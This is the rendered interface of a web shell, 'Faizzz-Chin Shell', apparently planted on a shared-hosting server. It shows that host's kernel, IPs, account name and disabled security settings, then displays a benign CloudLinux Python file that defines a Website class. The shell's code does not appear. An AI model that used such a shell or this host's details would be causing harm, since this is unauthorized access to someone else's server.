SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

Uname\Kernel: Linux server234.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server: LiteSpeed
PHP Version: 8.3.30 [ PHP INFO ]
Operating System: Linux
Server Ip: 104.21.32.157
Your Ip: 216.73.217.61
Date Time: 2026-05-10 04:35:59
User: repauqkb (12019) | Group: repauqkb (11967)
Safe Mode: OFF
Disable Function: NONE

name : models.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT


class Website(object):
    """
    Represents a website with its domain and document root.
    Used for per-domain configuration in PHP Selector.
    """
    def __init__(self, domain: str, docroot: str):
        """
        Initialize Website instance
        """
        self.domain = domain
        self.docroot = docroot

    def __repr__(self):
        return "Website(domain='%s', docroot='%s')" % (self.domain, self.docroot)

    def __eq__(self, other):
        if not isinstance(other, Website):
            return False
        return self.domain == other.domain and self.docroot == other.docroot

© 2026 Faizzz-Chin